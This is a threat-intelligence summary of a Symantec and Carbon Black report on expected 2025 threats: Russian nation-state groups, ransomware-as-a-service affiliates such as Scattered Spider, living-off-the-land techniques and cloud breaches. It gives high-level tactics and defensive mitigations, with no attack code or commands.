Full Report
These threats and trends just may define your year
Analysis Summary
# Main Topic
The core threat intelligence focus is on the four key cybersecurity challenges expected to define the threat landscape for organizations in 2025, as sourced from the Symantec & Carbon Black Threat Hunter Team intelligence.
## Key Points
- Nation-state actors are intensifying activities, with conditions resembling the 2016 spike in Russian cyber aggression.
- The rise of Ransomware-as-a-Service (RaaS) continues to fuel scalable and competitive ransomware operations.
- Living-off-the-Land (LotL) attacks are increasing at an alarming rate, often bypassing traditional malware detection.
- Cloud security defenses are increasingly being targeted, with nation-state actors demonstrating sophisticated breaches of major cloud environments like Microsoft 365.
## Threat Actors
- **Sandworm:** A Russian nation-state group known for destructive attacks, exemplified by past actions against Ukraine's power grid.
- **Dragonfly:** A Russian group capable of deep penetration into energy sector networks, utilizing spear phishing and custom Trojans.
- **Scattered Spider:** A prominent "super affiliate" in the RaaS ecosystem, known for social engineering help desk staff to bypass MFA; they have affiliated with groups like Noberus, RansomHub, and Qilin.
- **Fritillary (also known as Midnight Blizzard or APT29):** A Russian nation-state group innovating in cloud compromises, specifically targeting and breaching Microsoft 365 accounts, including those held by senior executives.
## TTPs
- **Russian Actors (General):** Escalating tactics, including physical sabotage (e.g., cutting undersea cables).
- **Dragonfly:** Utilizing spear phishing, custom Trojans, and achieving lateral movement across both administrative and Industrial Control System (ICS) networks.
- **Scattered Spider:** Executing successful social engineering attacks against help desk personnel to facilitate password changes and Multi-Factor Authentication (MFA) bypass.
- **LotL Attacks:** Heavy reliance on legitimate, native operating system tools for network infiltration and lateral movement.
- Specific LotL tools mentioned: PowerShell, PsExec, WMI, Schtasks, BITSAdmin, and Vssadmin.
- **Fritillary/APT29:** Demonstrating specific targeting of cloud environments, notably achieving breaches of Microsoft 365 accounts.
## Affected Systems
- **Energy Sector Networks:** Specifically targeted by Dragonfly, including Industrial Control System (ICS) networks.
- **Enterprise Systems:** Targeted by affiliates like Scattered Spider leading to credential compromise.
- **Cloud Services (Microsoft 365):** Targeted by Fritillary, including accounts belonging to senior executives.
- **Operating Systems:** Implicitly affected by the widespread use of native tools in LotL attacks.
## Mitigations
- **For Russian Nation-State Threats:** Organizations should be aware of heightened risk mirroring 2016 conditions.
- **For RaaS/Affiliates:** Defense must adapt continuously as affiliates shift between RaaS platforms rapidly following law enforcement action.
- **For LotL Attacks:** Enhance visibility and detection capabilities to spot the use of legitimate, signed binaries (like PowerShell) for malicious activity, as malware is often not required.
- **For Cloud Threats:** Security posture must be rigorously reviewed for cloud services, as the perception of inherent security is being challenged; focus on securing M365 environments against sophisticated nation-state methodologies.
## Conclusion
The 2025 threat environment will be defined by an escalation in state-sponsored aggression, sophisticated social engineering/credential theft underpinning RaaS, an increased reliance on undetectable LotL techniques, and a critical shift in focus towards breaching highly-secured cloud infrastructures. Proactive defense requires shifting detection focus away from just malware signatures toward monitoring legitimate tool misuse and strengthening cloud access controls.